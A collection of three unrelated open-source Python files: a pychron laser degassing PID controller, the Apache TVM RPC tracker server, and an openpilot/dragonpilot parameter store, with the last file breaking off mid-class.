|
degasser.py
|
# ===============================================================================
# Copyright 2013 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# ============= enthought library imports =======================
from __future__ import absolute_import
from chaco.plot_containers import HPlotContainer
from enable.component_editor import ComponentEditor
from traits.api import HasTraits, Int, Float, Instance, Range, on_trait_change, Button
from traitsui.api import View, Item, UItem, ButtonEditor, HGroup, VGroup
# ============= standard library imports ========================
from numpy import uint8, zeros, random, uint16
from skimage.color import gray2rgb
from threading import Event, Thread
import yaml
import os
import time
# ============= local library imports ==========================
from pychron.core.pid import PID
from pychron.core.ui.gui import invoke_in_main_thread
from pychron.graph.graph import Graph
from pychron.graph.stream_graph import StreamStackedGraph
from pychron.loggable import Loggable
from pychron.paths import paths
class LM:
def __init__(self, t, dt=1):
self._pid = PID(kp=-0.5, ki=0.1)
self._dt = dt
self._target_value = t
def set_laser_power_hook(self, *args, **kw):
pass
def get_brightness(self, v):
err = self._target_value - v
out = self._pid.get_value(err, self._dt)
src = random.randint(0, 255, (150, 150))
return src.astype(uint8), out
class Degasser(Loggable):
laser_manager = None
lumens = Float(50)
pid = Instance(PID)
stream_graph = Instance(StreamStackedGraph, ())
img_graph = Instance(Graph, ())
plot_container = Instance(HPlotContainer, ())
threshold = Range(0,100, 25)
test = Button
edit_pid_button = Button
save_button = Button
_lum_thread = None
_lum_evt = None
_luminosity_value = 0
_testing = False
_info = None
def stop(self):
self.debug('stop')
self.dump()
if self._lum_evt:
self._lum_evt.set()
if self._info:
invoke_in_main_thread(self._info.dispose, abort=True)
@property
def persistence_path(self):
return os.path.join(paths.setup_dir, 'pid_degasser.yaml')
def load(self):
self.debug('loading')
self.pid = PID()
p = self.persistence_path
if not os.path.isfile(p):
self.warning('No PID degasser file located at {}'.format(p))
return
with open(p, 'rb') as rfile:
jd = yaml.load(rfile)
if jd:
self.threshold = jd['threshold']
self.pid.load_from_obj(jd['pid'])
def dump(self):
self.debug('dump')
obj = self.pid.get_dump_obj()
jd = {'pid': obj, 'threshold': self.threshold}
with open(self.persistence_path, 'wb') as wfile:
yaml.dump(jd, wfile, encoding='utf-8')
def degas(self, lumens=None, autostart=True):
self.load()
if lumens is None:
lumens = self.lumens
self.lumens = lumens
self._setup_graph()
# def _open():
# self._info = self.edit_traits()
#
# invoke_in_main_thread(_open)
if autostart:
self.start()
def start(self):
self.pid.reset()
self._lum_evt = Event()
self._lum_thread = Thread(target=self._degas, args=(self.lumens, self.pid))
self._lum_thread.start()
def _edit_pid_button_fired(self):
info = self.pid.edit_traits(kind='livemodal')
if info.result:
self.dump()
def _save_button_fired(self):
self.dump()
def _test_fired(self):
if self._testing:
self.stop()
self.laser_manager.disable_laser()
self.stream_graph.export_data(path='/Users/argonlab3/Desktop/degas.csv')
else:
self.laser_manager.enable_laser()
self.start()
self._testing = not self._testing
def _setup_graph(self):
self.plot_container = HPlotContainer()
g = self.stream_graph
g.clear()
g.new_plot(padding_left=70, padding_right=10)
g.new_series(plotid=0)
g.set_y_title('Lumens', plotid=0)
g.new_plot(padding_left=70, padding_right=10)
g.new_series(plotid=1)
g.set_y_title('Error', plotid=1)
g.new_plot(padding_left=70, padding_right=10)
g.new_series(plotid=2)
g.set_y_title('Output', plotid=2)
g = self.img_graph
g.clear()
imgplot = g.new_plot(padding_right=10)
imgplot.aspect_ratio = 1.0
imgplot.x_axis.visible = False
imgplot.y_axis.visible = False
imgplot.x_grid.visible = False
imgplot.y_grid.visible = False
imgplot.data.set_data('imagedata', zeros((150, 150, 3), dtype=uint8))
imgplot.img_plot('imagedata', origin='top left')
self.plot_container.add(self.stream_graph.plotcontainer)
self.plot_container.add(self.img_graph.plotcontainer)
def _degas(self, lumens, pid):
self.lumens = lumens
g = self.stream_graph
img = self.img_graph.plots[0]
def update(c, e, o, src):
g.record(c, plotid=0)
g.record(e, plotid=1)
g.record(o, plotid=2)
if src.dtype == uint16:
src = src.astype('uint32')
src = src/4095 * 255
src = src.astype('uint8')
imgdata = gray2rgb(src)
img.data.set_data('imagedata', imgdata)
evt = self._lum_evt
set_laser_power = self.laser_manager.set_laser_power_hook
get_brightness = self.laser_manager.get_brightness
target = self.lumens
prev = 0
while not evt.is_set():
dt = pid.kdt
st = time.time()
src, current = get_brightness(threshold=self.threshold)
err = target - current
out = pid.get_value(err) or 0
invoke_in_main_thread(update, current, err, out, src)
if abs(prev - out) > 0.02:
self.debug('set power output={}'.format(out))
set_laser_power(out)
prev = out
et = time.time() - st
t = dt - et
if t > 0:
evt.wait(dt)
def traits_view(self):
v = View(VGroup(Item('pid', style='custom'),
Item('threshold', label='T'),
Item('test'),
UItem('plot_container', style='custom', editor=ComponentEditor())))
return v
if __name__ == '__main__':
d = Degasser(laser_manager=LM(30))
d.configure_traits()
# ============= EOF =============================================
#
# class PID(HasTraits):
# _integral_err = 0
# _prev_err = 0
# Kp = Float(0.25)
# Ki = Float(0.0001)
# Kd = Float(0)
# min_output = 0
# max_output = 100
#
# def get_value(self, error, dt):
# self._integral_err += (error * dt)
# derivative = (error - self._prev_err) / dt
# output = (self.Kp * error) + (self.Ki * self._integral_err) + (
# self.Kd * derivative)
# self._prev_err = error
# return min(self.max_output, max(self.min_output, output))
#
# def traits_view(self):
# v = View(
# Item('Kp'),
# Item('Ki'),
# Item('Kd'))
# return v
#
#
# class Degasser(MachineVisionManager, ExecuteMixin):
# _period = 0.05
# crop_width = Int(5)
# crop_height = Int(5)
#
# _test_lumens = Float(100)
# _test_duration = Int(10)
# _test_graph = Instance(StackedGraph)
# _test_image = Instance(MVImage)
# _testing = False
#
# pid = Instance(PID, ())
# _detector = Instance(LumenDetector)
#
# def degas(self, lumens, duration):
# """
# degas for duration trying to maintain
# lumens
# """
# if self.laser_manager:
# self.laser_manager.fiber_light.power_off()
#
# g = self._make_graph(lumens, duration)
# if self._testing:
# self._test_graph = g
# else:
# self.laser_manager.auxilary_graph = g.plotcontainer
#
# cw, ch = 2 * self.crop_width * self.pxpermm, 2 * self.crop_height * self.pxpermm
#
# # if not cw % 5 == 0:
# # cw += cw % 5
# # if not ch % 5 == 0:
# # ch += ch % 5
# #
# # cw, ch = 200, 200
#
# im = MVImage()
# im.setup_images(1, (cw, ch))
# if self._testing:
# self._test_image = im
# else:
# self.view_image(im)
#
# self._detector = LumenDetector()
# dt = self._period
#
# pid = self.pid
# st = time.time()
# i = 0
# while 1:
# ct = time.time()
# tt = ct - st
# if not self.isAlive():
# break
#
# cl = self._get_current_lumens(im, cw, ch)
#
# err = lumens - cl
# out = pid.get_value(err, dt)
# g.add_data(((tt, out), (tt, err), (tt, cl)))
#
# self._set_power(out, i)
#
# if tt > duration:
# break
# et = time.time() - ct
# time.sleep(max(0, dt - et))
#
# i += 1
# if i > 1e6:
# i = 0
#
# if self.laser_manager:
# self.laser_manager.fiber_light.power_on()
#
# self.executing = False
#
# def _set_power(self, pwr, cnt):
# if self.laser_manager:
# self.laser_manager.set_laser_power(pwr, verbose=cnt == 0)
#
# def _get_current_lumens(self, im, cw, ch):
# src = self.new_image_frame()
# if src:
# src = self._crop_image(src, cw, ch)
# else:
# src = random.random((ch, cw)) * 255
# src = src.astype('uint8')
# src, v = self._detector.get_value(src)
# im.set_image(src)
# return v
#
# def _make_graph(self, lumens, duration):
# g = StackedGraph(container_dict=dict(stack_order='top_to_bottom'))
# g.new_plot(ytitle='Output (W)')
# g.new_series()
# g.new_plot(ytitle='Residual')
# g.new_series(plotid=1)
# g.new_plot(ytitle='Lumens', xtitle='time (s)')
# g.new_series(plotid=2)
#
# g.add_horizontal_rule(lumens, plotid=2)
# g.set_x_limits(0, duration * 1.1)
# return g
#
# def _do_execute(self):
#
# self.debug('starting test degas {} {}'.format(self._test_lumens,
# self._test_duration))
# self._testing = True
# self.degas(self._test_lumens, self._test_duration)
#
# def traits_view(self):
# v = View(UItem('execute',
# editor=ButtonEditor(label_value='execute_label')),
# HGroup(Item('_test_lumens'), Item('_test_duration')),
# UItem('pid', style='custom'),
# HGroup(UItem('_test_graph',
# height=400,
# style='custom'),
# UItem('_test_image', style='custom')),
# resizable=True)
# return v
#
#
|
tracker.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""RPC Tracker, tracks and distributes the TVM RPC resources.
This folder implements the tracker server logic.
Note
----
Tracker is a TCP based rest api with the following protocol:
- Initial handshake to the peer
- RPC_TRACKER_MAGIC
- Normal message: [size(int32), json-data]
- Each message is initiated by the client, and the tracker replies with a json.
List of available APIs:
- PING: check if tracker is alive
- input: [TrackerCode.PING]
- return: TrackerCode.SUCCESS
- PUT: report resource to tracker
- input: [TrackerCode.PUT, [port, match-key]]
- return: TrackerCode.SUCCESS
- note: match-key is a randomly generated identify the resource during connection.
- REQUEST: request a new resource from tracker
- input: [TrackerCode.REQUEST, [key, user, priority]]
- return: [TrackerCode.SUCCESS, [url, port, match-key]]
"""
# pylint: disable=invalid-name
import asyncio
import heapq
import logging
import socket
import threading
import errno
import struct
import json
from tvm.contrib.popen_pool import PopenWorker
try:
from tornado import ioloop
from . import tornado_util
except ImportError as error_msg:
raise ImportError(
"RPCTracker module requires tornado package %s. Try 'pip install tornado'." % error_msg
)
from .._ffi.base import py_str
from . import base
from .base import RPC_TRACKER_MAGIC, TrackerCode
logger = logging.getLogger("RPCTracker")
class Scheduler(object):
"""Abstract interface of scheduler."""
def put(self, value):
"""Push a resource into the scheduler.
This function can trigger callbacks in the scheduler.
Parameters
----------
value : object
The resource to be put in the scheduler.
"""
raise NotImplementedError()
def request(self, user, priority, callback):
"""Request a resource.
Parameters
----------
user : str
The user who is requesting the resource.
priority : int
The job priority
callback : function: value->bool
Callback function to receive an resource when ready
returns True if the resource is consumed.
"""
raise NotImplementedError()
def remove(self, value):
"""Remove a resource in the scheduler
Parameters
----------
value: object
The resource to remove
"""
def summary(self):
"""Get summary information of the scheduler."""
raise NotImplementedError()
class PriorityScheduler(Scheduler):
"""Priority based scheduler, FIFO based on request order"""
def __init__(self, key):
self._key = key
self._request_cnt = 0
self._lock = threading.Lock()
self._values = []
self._requests = []
def _schedule(self):
while self._requests and self._values:
value = self._values.pop(0)
item = heapq.heappop(self._requests)
callback = item[-1]
if callback(value[1:]):
value[0].pending_matchkeys.remove(value[-1])
else:
self._values.append(value)
def put(self, value):
self._values.append(value)
self._schedule()
def request(self, user, priority, callback):
with self._lock:
heapq.heappush(self._requests, (-priority, self._request_cnt, callback))
self._request_cnt += 1
self._schedule()
def remove(self, value):
if value in self._values:
self._values.remove(value)
self._schedule()
def summary(self):
"""Get summary information of the scheduler."""
return {"free": len(self._values), "pending": len(self._requests)}
class TCPEventHandler(tornado_util.TCPHandler):
"""Base asynchronize message handler.
The tracker and client follows a simple message protocol.
The message is in form [nbytes(int32)] [json-str].
All the information is packed in json-str
"""
def __init__(self, tracker, sock, addr):
super(TCPEventHandler, self).__init__(sock)
self._data = bytearray()
self._tracker = tracker
self._msg_size = 0
self._addr = addr
self._init_req_nbytes = 4
self._info = {}
# list of pending match keys that has not been used.
self.pending_matchkeys = set()
self._tracker._connections.add(self)
self.put_values = []
def name(self):
"""name of connection"""
return "TCPSocket: %s" % str(self._addr)
def summary(self):
"""Summary of this connection"""
return self._info
def _init_conn(self, message):
"""Initialize the connection"""
if len(message) != 4:
logger.warning("Invalid connection from %s", self.name())
self.close()
magic = struct.unpack("<i", message)[0]
if magic != RPC_TRACKER_MAGIC:
logger.warning("Invalid magic from %s", self.name())
self.close()
self.write_message(struct.pack("<i", RPC_TRACKER_MAGIC), binary=True)
self._init_req_nbytes = 0
def on_message(self, message):
"""Callback when a message is received.
Parameters
----------
message : bytearray
The bytes received
"""
assert isinstance(message, bytes)
if self._init_req_nbytes:
self._init_conn(message)
return
self._data += message
while True:
if self._msg_size == 0:
if len(self._data) >= 4:
self._msg_size = struct.unpack("<i", self._data[:4])[0]
else:
return
if self._msg_size != 0 and len(self._data) >= self._msg_size + 4:
msg = py_str(bytes(self._data[4 : 4 + self._msg_size]))
del self._data[: 4 + self._msg_size]
self._msg_size = 0
# pylint: disable=broad-except
self.call_handler(json.loads(msg))
else:
return
def ret_value(self, data):
"""return value to the output"""
data = json.dumps(data)
self.write_message(struct.pack("<i", len(data)), binary=True)
self.write_message(data.encode("utf-8"), binary=True)
def call_handler(self, args):
"""Event handler when json request arrives."""
code = args[0]
if code == TrackerCode.PUT:
key = args[1]
port, matchkey = args[2]
self.pending_matchkeys.add(matchkey)
# got custom address (from rpc server)
if len(args) >= 4 and args[3] is not None:
value = (self, args[3], port, matchkey)
else:
value = (self, self._addr[0], port, matchkey)
self._tracker.put(key, value)
self.put_values.append(value)
self.ret_value(TrackerCode.SUCCESS)
elif code == TrackerCode.REQUEST:
key = args[1]
user = args[2]
priority = args[3]
def _cb(value):
# if the connection is already closed
if not self._sock:
return False
try:
self.ret_value([TrackerCode.SUCCESS, value])
except (socket.error, IOError):
return False
return True
self._tracker.request(key, user, priority, _cb)
elif code == TrackerCode.PING:
self.ret_value(TrackerCode.SUCCESS)
elif code == TrackerCode.GET_PENDING_MATCHKEYS:
self.ret_value(list(self.pending_matchkeys))
elif code == TrackerCode.STOP:
# safe stop tracker
if self._tracker._stop_key == args[1]:
self.ret_value(TrackerCode.SUCCESS)
self._tracker.stop()
else:
self.ret_value(TrackerCode.FAIL)
elif code == TrackerCode.UPDATE_INFO:
info = args[1]
assert isinstance(info, dict)
if info["addr"][0] is None:
info["addr"][0] = self._addr[0]
self._info.update(info)
self.ret_value(TrackerCode.SUCCESS)
elif code == TrackerCode.SUMMARY:
status = self._tracker.summary()
self.ret_value([TrackerCode.SUCCESS, status])
else:
logger.warning("Unknown tracker code %d", code)
self.close()
def on_close(self):
self._tracker.close(self)
def on_error(self, err):
logger.warning("%s: Error in RPC Tracker: %s", self.name(), err)
self.close()
class TrackerServerHandler(object):
"""Tracker that tracks the resources."""
def __init__(self, sock, stop_key):
self._scheduler_map = {}
self._sock = sock
self._sock.setblocking(0)
self._ioloop = ioloop.IOLoop.current()
self._stop_key = stop_key
self._connections = set()
def _event_handler(_, events):
self._on_event(events)
self._ioloop.add_handler(self._sock.fileno(), _event_handler, self._ioloop.READ)
def _on_event(self, _):
while True:
try:
conn, addr = self._sock.accept()
TCPEventHandler(self, conn, addr)
except socket.error as err:
if err.args[0] in (errno.EAGAIN, errno.EWOULDBLOCK):
break
def create_scheduler(self, key):
"""Create a new scheduler."""
return PriorityScheduler(key)
def put(self, key, value):
"""Report a new resource to the tracker."""
if key not in self._scheduler_map:
self._scheduler_map[key] = self.create_scheduler(key)
self._scheduler_map[key].put(value)
def request(self, key, user, priority, callback):
"""Request a new resource."""
if key not in self._scheduler_map:
self._scheduler_map[key] = self.create_scheduler(key)
self._scheduler_map[key].request(user, priority, callback)
def close(self, conn):
self._connections.remove(conn)
if "key" in conn._info:
for value in conn.put_values:
_, _, _, key = value
rpc_key = key.split(":")[0]
self._scheduler_map[rpc_key].remove(value)
def stop(self):
"""Safely stop tracker."""
for conn in list(self._connections):
conn.close()
self._sock.close()
self._ioloop.stop()
def summary(self):
"""Return a dict summarizing current status."""
qinfo = {}
for k, v in self._scheduler_map.items():
qinfo[k] = v.summary()
cinfo = []
# ignore client connections without key
for conn in self._connections:
res = conn.summary()
if res.get("key", "").startswith("server"):
cinfo.append(res)
return {"queue_info": qinfo, "server_info": cinfo}
def run(self):
"""Run the tracker server"""
self._ioloop.start()
def _tracker_server(listen_sock, stop_key):
asyncio.set_event_loop(asyncio.new_event_loop())
handler = TrackerServerHandler(listen_sock, stop_key)
handler.run()
class PopenTrackerServerState(object):
"""Internal PopenTrackerServer State"""
current = None
def __init__(self, host, port=9190, port_end=9199, silent=False):
if silent:
logger.setLevel(logging.WARN)
sock = socket.socket(base.get_addr_family((host, port)), socket.SOCK_STREAM)
self.port = None
self.stop_key = base.random_key("tracker")
for my_port in range(port, port_end):
try:
sock.bind((host, my_port))
self.port = my_port
break
except socket.error as sock_err:
if sock_err.errno in [errno.EADDRINUSE]:
continue
raise sock_err
if not self.port:
raise ValueError("cannot bind to any port in [%d, %d)" % (port, port_end))
logger.info("bind to %s:%d", host, self.port)
sock.listen(1)
self.thread = threading.Thread(target=_tracker_server, args=(sock, self.stop_key))
self.thread.start()
self.host = host
def _popen_start_tracker_server(host, port=9190, port_end=9199, silent=False):
# This is a function that will be sent to the
# Popen worker to run on a separate process.
# Create and start the server in a different thread
state = PopenTrackerServerState(host, port, port_end, silent)
PopenTrackerServerState.current = state
# returns the port so that the main can get the port number.
return (state.port, state.stop_key)
class Tracker(object):
"""Start RPC tracker on a separate process.
Python implementation based on PopenWorker.
Parameters
----------
host : str
The host url of the server.
port : int
The TCP port to be bind to
port_end : int, optional
The end TCP port to search
silent: bool, optional
Whether run in silent mode
"""
def __init__(self, host="0.0.0.0", port=9190, port_end=9199, silent=False):
if silent:
logger.setLevel(logging.WARN)
self.proc = PopenWorker()
# send the function
self.proc.send(
_popen_start_tracker_server,
[
host,
port,
port_end,
silent,
],
)
# receive the port
self.port, self.stop_key = self.proc.recv()
self.host = host
def _stop_tracker(self):
sock = socket.socket(base.get_addr_family((self.host, self.port)), socket.SOCK_STREAM)
sock.connect(("127.0.0.1", self.port))
sock.sendall(struct.pack("<i", base.RPC_TRACKER_MAGIC))
magic = struct.unpack("<i", base.recvall(sock, 4))[0]
assert magic == base.RPC_TRACKER_MAGIC
base.sendjson(sock, [TrackerCode.STOP, self.stop_key])
assert base.recvjson(sock) == TrackerCode.SUCCESS
sock.close()
def terminate(self):
"""Terminate the server process"""
if self.proc:
if self.proc.is_alive():
self._stop_tracker()
self.proc.join(0.1)
if self.proc.is_alive():
logger.info("Terminating Tracker Server...")
self.proc.kill()
self.proc = None
def __del__(self):
try:
self.terminate()
except TypeError:
pass
|
params.py
|
#!/usr/bin/env python3
"""ROS has a parameter server, we have files.
The parameter store is a persistent key value store, implemented as a directory with a writer lock.
On Android, we store params under params_dir = /data/params. The writer lock is a file
"<params_dir>/.lock" taken using flock(), and data is stored in a directory symlinked to by
"<params_dir>/d".
Each key, value pair is stored as a file with named <key> with contents <value>, located in
<params_dir>/d/<key>
Readers of a single key can just open("<params_dir>/d/<key>") and read the file contents.
Readers who want a consistent snapshot of multiple keys should take the lock.
Writers should take the lock before modifying anything. Writers should also leave the DB in a
consistent state after a crash. The implementation below does this by copying all params to a temp
directory <params_dir>/<tmp>, then atomically symlinking <params_dir>/<d> to <params_dir>/<tmp>
before deleting the old <params_dir>/<d> directory.
Writers that only modify a single key can simply take the lock, then swap the corresponding value
file in place without messing with <params_dir>/d.
"""
import time
import os
import string
import binascii
import errno
import sys
import shutil
import fcntl
import tempfile
import threading
from enum import Enum
from common.basedir import PARAMS
def mkdirs_exists_ok(path):
try:
os.makedirs(path)
except OSError:
if not os.path.isdir(path):
raise
class TxType(Enum):
PERSISTENT = 1
CLEAR_ON_MANAGER_START = 2
CLEAR_ON_PANDA_DISCONNECT = 3
class UnknownKeyName(Exception):
pass
keys = {
"AccessToken": [TxType.CLEAR_ON_MANAGER_START],
"AthenadPid": [TxType.PERSISTENT],
"CalibrationParams": [TxType.PERSISTENT],
"CarParams": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"CarParamsCache": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"CarVin": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"CommunityFeaturesToggle": [TxType.PERSISTENT],
"CompletedTrainingVersion": [TxType.PERSISTENT],
"ControlsParams": [TxType.PERSISTENT],
"DisablePowerDown": [TxType.PERSISTENT],
"DoUninstall": [TxType.CLEAR_ON_MANAGER_START],
"DongleId": [TxType.PERSISTENT],
"GitBranch": [TxType.PERSISTENT],
"GitCommit": [TxType.PERSISTENT],
"GitRemote": [TxType.PERSISTENT],
"GithubSshKeys": [TxType.PERSISTENT],
"HasAcceptedTerms": [TxType.PERSISTENT],
"HasCompletedSetup": [TxType.PERSISTENT],
"IsDriverViewEnabled": [TxType.CLEAR_ON_MANAGER_START],
"IsLdwEnabled": [TxType.PERSISTENT],
"IsGeofenceEnabled": [TxType.PERSISTENT],
"IsMetric": [TxType.PERSISTENT],
"IsOffroad": [TxType.CLEAR_ON_MANAGER_START],
"IsRHD": [TxType.PERSISTENT],
"IsTakingSnapshot": [TxType.CLEAR_ON_MANAGER_START],
"IsUpdateAvailable": [TxType.CLEAR_ON_MANAGER_START],
"IsUploadRawEnabled": [TxType.PERSISTENT],
"LastAthenaPingTime": [TxType.PERSISTENT],
"LastUpdateTime": [TxType.PERSISTENT],
"LimitSetSpeed": [TxType.PERSISTENT],
"LimitSetSpeedNeural": [TxType.PERSISTENT],
"LiveParameters": [TxType.PERSISTENT],
"LongitudinalControl": [TxType.PERSISTENT],
"OpenpilotEnabledToggle": [TxType.PERSISTENT],
"LaneChangeEnabled": [TxType.PERSISTENT],
"PandaFirmware": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"PandaFirmwareHex": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"PandaDongleId": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"Passive": [TxType.PERSISTENT],
"RecordFront": [TxType.PERSISTENT],
"ReleaseNotes": [TxType.PERSISTENT],
"ShouldDoUpdate": [TxType.CLEAR_ON_MANAGER_START],
"SpeedLimitOffset": [TxType.PERSISTENT],
"SubscriberInfo": [TxType.PERSISTENT],
"TermsVersion": [TxType.PERSISTENT],
"TrainingVersion": [TxType.PERSISTENT],
"UpdateAvailable": [TxType.CLEAR_ON_MANAGER_START],
"UpdateFailedCount": [TxType.CLEAR_ON_MANAGER_START],
"Version": [TxType.PERSISTENT],
"Offroad_ChargeDisabled": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"Offroad_ConnectivityNeeded": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_ConnectivityNeededPrompt": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_TemperatureTooHigh": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_PandaFirmwareMismatch": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"Offroad_InvalidTime": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_IsTakingSnapshot": [TxType.CLEAR_ON_MANAGER_START],
#dragonpilot config
"DragonEnableDashcam": [TxType.PERSISTENT],
"DragonEnableAutoShutdown": [TxType.PERSISTENT],
"DragonAutoShutdownAt": [TxType.PERSISTENT],
"DragonEnableSteeringOnSignal": [TxType.PERSISTENT],
"DragonEnableLogger": [TxType.PERSISTENT],
"DragonEnableUploader": [TxType.PERSISTENT],
"DragonNoctuaMode": [TxType.PERSISTENT],
"DragonCacheCar": [TxType.PERSISTENT],
"DragonCachedModel": [TxType.CLEAR_ON_MANAGER_START], # deprecated
"DragonCachedFP": [TxType.CLEAR_ON_MANAGER_START], # deprecated
"DragonCachedVIN": [TxType.CLEAR_ON_MANAGER_START], # deprecated
"DragonCachedCarFW": [TxType.CLEAR_ON_MANAGER_START], # deprecated
"DragonCachedSource": [TxType.CLEAR_ON_MANAGER_START], # deprecated
"DragonAllowGas": [TxType.PERSISTENT],
"DragonToyotaStockDSU": [TxType.PERSISTENT],
"DragonLatCtrl": [TxType.PERSISTENT],
"DragonUISpeed": [TxType.PERSISTENT],
"DragonUIEvent": [TxType.PERSISTENT],
"DragonUIMaxSpeed": [TxType.PERSISTENT],
"DragonUIFace": [TxType.PERSISTENT],
"DragonUIDev": [TxType.PERSISTENT],
"DragonUIDevMini": [TxType.PERSISTENT],
"DragonEnableTomTom": [TxType.PERSISTENT],
"DragonBootTomTom": [TxType.PERSISTENT],
"DragonRunTomTom": [TxType.PERSISTENT],
"DragonEnableAutonavi": [TxType.PERSISTENT],
"DragonBootAutonavi": [TxType.PERSISTENT],
"DragonRunAutonavi": [TxType.PERSISTENT],
"DragonEnableAegis": [TxType.PERSISTENT],
"DragonBootAegis": [TxType.PERSISTENT],
"DragonRunAegis": [TxType.PERSISTENT],
"DragonEnableMixplorer": [TxType.PERSISTENT],
"DragonRunMixplorer": [TxType.PERSISTENT],
"DragonSteeringMonitorTimer": [TxType.PERSISTENT],
"DragonCameraOffset": [TxType.PERSISTENT],
"DragonUIVolumeBoost": [TxType.PERSISTENT],
"DragonGreyPandaMode": [TxType.PERSISTENT],
"DragonDrivingUI": [TxType.PERSISTENT],
"DragonDisplaySteeringLimitAlert": [TxType.PERSISTENT],
"DragonChargingCtrl": [TxType.PERSISTENT],
"DragonCharging": [TxType.PERSISTENT],
"DragonDisCharging": [TxType.PERSISTENT],
"DragonToyotaLaneDepartureWarning": [TxType.PERSISTENT],
"DragonUILane": [TxType.PERSISTENT],
"DragonUILead": [TxType.PERSISTENT],
"DragonUIPath": [TxType.PERSISTENT],
"DragonUIBlinker": [TxType.PERSISTENT],
"DragonUIDMView": [TxType.PERSISTENT],
"DragonEnableDriverMonitoring": [TxType.PERSISTENT],
"DragonCarModel": [TxType.CLEAR_ON_MANAGER_START],
"DragonEnableSlowOnCurve": [TxType.PERSISTENT],
"DragonEnableLeadCarMovingAlert": [TxType.PERSISTENT],
"DragonToyotaSnGMod": [TxType.PERSISTENT],
"DragonWazeMode": [TxType.PERSISTENT],
"DragonRunWaze": [TxType.PERSISTENT],
"DragonEnableAutoLC": [TxType.PERSISTENT],
"DragonAssistedLCMinMPH": [TxType.PERSISTENT],
"DragonAutoLCMinMPH": [TxType.PERSISTENT],
"DragonAutoLCDelay": [TxType.PERSISTENT],
"DragonBTG": [TxType.PERSISTENT],
"DragonBootHotspot": [TxType.PERSISTENT],
"DragonAccelProfile": [TxType.PERSISTENT],
"DragonLastModified": [TxType.CLEAR_ON_MANAGER_START],
"DragonEnableRegistration": [TxType.PERSISTENT],
"DragonDynamicFollow": [TxType.PERSISTENT],
"DragonToyotaSngResponse": [TxType.PERSISTENT],
"DragonEnableGearCheck": [TxType.PERSISTENT],
"DragonEnableTempMonitor": [TxType.PERSISTENT],
"DragonAppAutoUpdate": [TxType.PERSISTENT],
"DragonUpdating": [TxType.CLEAR_ON_MANAGER_START],
"DragonCustomModel": [TxType.PERSISTENT],
"DragonSupportedCars": [TxType.PERSISTENT],
"DragonLocale": [TxType.PERSISTENT],
"DragonUIScreenOffReversing": [TxType.PERSISTENT],
"DragonEnableSRLearner": [TxType.PERSISTENT],
"DragonEnableSteerBoost": [TxType.PERSISTENT],
"DragonSteerBoostMin": [TxType.PERSISTENT],
"DragonSteerBoostMax": [TxType.PERSISTENT],
"DragonSteerBoostMinAt": [TxType.PERSISTENT],
"DragonSteerBoostMaxAt": [TxType.PERSISTENT],
"DragonDashcamHours": [TxType.PERSISTENT],
"DragonUIScreenOffDriving": [TxType.PERSISTENT],
"DragonEnableAutoUpdate": [TxType.PERSISTENT],
"DragonUIBrightness": [TxType.PERSISTENT],
"DragonDashcamImpactDetect": [TxType.PERSISTENT],
"DragonDashcamImpactDetectStarted": [TxType.CLEAR_ON_MANAGER_START],
}
def fsync_dir(path):
fd = os.open(path, os.O_RDONLY)
try:
os.fsync(fd)
finally:
os.close(fd)
class FileLock():
def __init__(self, path, create):
self._path = path
self._create = create
self._fd = None
def acquire(self):
self._fd = os.open(self._path, os.O_CREAT if self._create else 0)
fcntl.flock(self._fd, fcntl.LOCK_EX)
def release(self):
if self._fd is not None:
os.close(self._fd)
self._fd = None
class DBAccessor():
def __init__(self, path):
self._path = path
self._vals = None
def keys(self):
self._check_entered()
return self._vals.keys()
def get(self, key):
self._check_entered()
try:
return self._vals[key]
except KeyError:
return None
def _get_lock(self, create):
lock = FileLock(os.path.join(self._path, ".lock"), create)
lock.acquire()
return lock
def _read_values_locked(self):
"""Callers should hold a lock while calling this method."""
vals = {}
try:
data_path = self._data_path()
keys = os.listdir(data_path)
for key in keys:
with open(os.path.join(data_path, key), "rb") as f:
vals[key] = f.read()
except (OSError, IOError) as e:
# Either the DB hasn't been created yet, or somebody wrote a bug and left the DB in an
# inconsistent state. Either way, return empty.
if e.errno == errno.ENOENT:
return {}
return vals
def _data_path(self):
return os.path.join(self._path, "d")
def _check_entered(self):
if self._vals is None:
raise Exception("Must call __enter__ before using DB")
class DBReader(DBAccessor):
def __enter__(self):
try:
lock = self._get_lock(False)
except OSError as e:
# Do not create lock if it does not exist.
if e.errno == errno.ENOENT:
self._vals = {}
return self
try:
# Read everything.
self._vals = self._read_values_locked()
return self
finally:
lock.release()
def __exit__(self, type, value, traceback): pass
class DBWriter(DBAccessor):
def __init__(self, path):
super(DBWriter, self).__init__(path)
self._lock = None
self._prev_umask = None
def put(self, key, value):
self._vals[key] = value
def delete(self, key):
self._vals.pop(key, None)
def __enter__(self):
